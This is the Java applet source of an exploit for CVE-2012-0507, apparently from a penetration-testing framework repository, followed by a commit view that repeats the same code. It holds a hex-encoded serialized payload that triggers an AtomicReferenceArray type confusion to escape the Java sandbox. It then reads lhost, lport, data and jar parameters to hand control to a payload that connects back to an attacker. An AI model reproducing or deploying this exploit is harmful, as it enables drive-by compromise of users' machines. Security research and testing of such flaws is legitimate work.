external/source/exploits/CVE-2012-0507/Exploit.java

package a;

import java.applet.Applet;
import java.io.ByteArrayInputStream;
import java.io.ObjectInputStream;
import java.util.concurrent.atomic.AtomicReferenceArray;
import a.*;

// Referenced classes of package a:
//			  Help

public class Exploit extends Applet
{

	public Exploit()
	{
	}

	public static byte[] StringToBytes(String s)
	{
		byte abyte0[] = new byte[s.length() / 2];
		for(int i = 0; i < s.length(); i += 2)
			abyte0[i / 2] = (byte)((Character.digit(s.charAt(i), 16) << 4) + Character.digit(s.charAt(i + 1), 16));

		return abyte0;
	}

	public void init()
	{
		try
		{
			String as[] = {
				"ACED0005757200135B4C6A6176612E6C616E672E4F62", "6A6563743B90CE589F1073296C020000787000000002", "757200095B4C612E48656C703BFE2C941188B6E5FF02", "000078700000000170737200306A6176612E7574696C", "2E636F6E63757272656E742E61746F6D69632E41746F", "6D69635265666572656E63654172726179A9D2DEA1BE", "65600C0200015B000561727261797400135B4C6A6176", "612F6C616E672F4F626A6563743B787071007E0003" 
			};
			StringBuilder stringbuilder = new StringBuilder();
			for(int i = 0; i < as.length; i++)
				stringbuilder.append(as[i]);

			ObjectInputStream objectinputstream = new ObjectInputStream(new ByteArrayInputStream(StringToBytes(stringbuilder.toString())));
			Object aobj[] = (Object[])(Object[])objectinputstream.readObject();
			Help ahelp[] = (Help[])(Help[])aobj[0];
			AtomicReferenceArray atomicreferencearray = (AtomicReferenceArray)aobj[1];
			ClassLoader classloader = getClass().getClassLoader();
			atomicreferencearray.set(0, classloader);
			Help _tmp = ahelp[0];
			
			String data  = getParameter( "data" );
			String jar   = getParameter( "jar" );
			String lhost = getParameter( "lhost" );
			String lport = getParameter( "lport" );	
			System.out.println("go go go");
			Help.doWork(ahelp[0], this, data, jar, lhost, ( lport == null ? 4444 : Integer.parseInt( lport ) ));
		}
		catch(Exception exception) { 
			System.out.println(exception.getMessage());
		}
	}
}
Add CVE-2012-0507 (Java) 2012-03-29 10:31:14 -05:00			`package a;`

			`import java.applet.Applet;`
			`import java.io.ByteArrayInputStream;`
			`import java.io.ObjectInputStream;`
			`import java.util.concurrent.atomic.AtomicReferenceArray;`
			`import a.*;`

			`// Referenced classes of package a:`
			`// Help`

			`public class Exploit extends Applet`
			`{`

			`public Exploit()`
			`{`
			`}`

			`public static byte[] StringToBytes(String s)`
			`{`
			`byte abyte0[] = new byte[s.length() / 2];`
			`for(int i = 0; i < s.length(); i += 2)`
			`abyte0[i / 2] = (byte)((Character.digit(s.charAt(i), 16) << 4) + Character.digit(s.charAt(i + 1), 16));`

			`return abyte0;`
			`}`

			`public void init()`
			`{`
			`try`
			`{`
			`String as[] = {`
			`"ACED0005757200135B4C6A6176612E6C616E672E4F62", "6A6563743B90CE589F1073296C020000787000000002", "757200095B4C612E48656C703BFE2C941188B6E5FF02", "000078700000000170737200306A6176612E7574696C", "2E636F6E63757272656E742E61746F6D69632E41746F", "6D69635265666572656E63654172726179A9D2DEA1BE", "65600C0200015B000561727261797400135B4C6A6176", "612F6C616E672F4F626A6563743B787071007E0003"`
			`};`
			`StringBuilder stringbuilder = new StringBuilder();`
			`for(int i = 0; i < as.length; i++)`
			`stringbuilder.append(as[i]);`

			`ObjectInputStream objectinputstream = new ObjectInputStream(new ByteArrayInputStream(StringToBytes(stringbuilder.toString())));`
			`Object aobj[] = (Object[])(Object[])objectinputstream.readObject();`
			`Help ahelp[] = (Help[])(Help[])aobj[0];`
			`AtomicReferenceArray atomicreferencearray = (AtomicReferenceArray)aobj[1];`
			`ClassLoader classloader = getClass().getClassLoader();`
			`atomicreferencearray.set(0, classloader);`
			`Help _tmp = ahelp[0];`

			`String data = getParameter( "data" );`
			`String jar = getParameter( "jar" );`
			`String lhost = getParameter( "lhost" );`
			`String lport = getParameter( "lport" );`
			`System.out.println("go go go");`
			`Help.doWork(ahelp[0], this, data, jar, lhost, ( lport == null ? 4444 : Integer.parseInt( lport ) ));`
			`}`
			`catch(Exception exception) {`
			`System.out.println(exception.getMessage());`
			`}`
			`}`
			`}`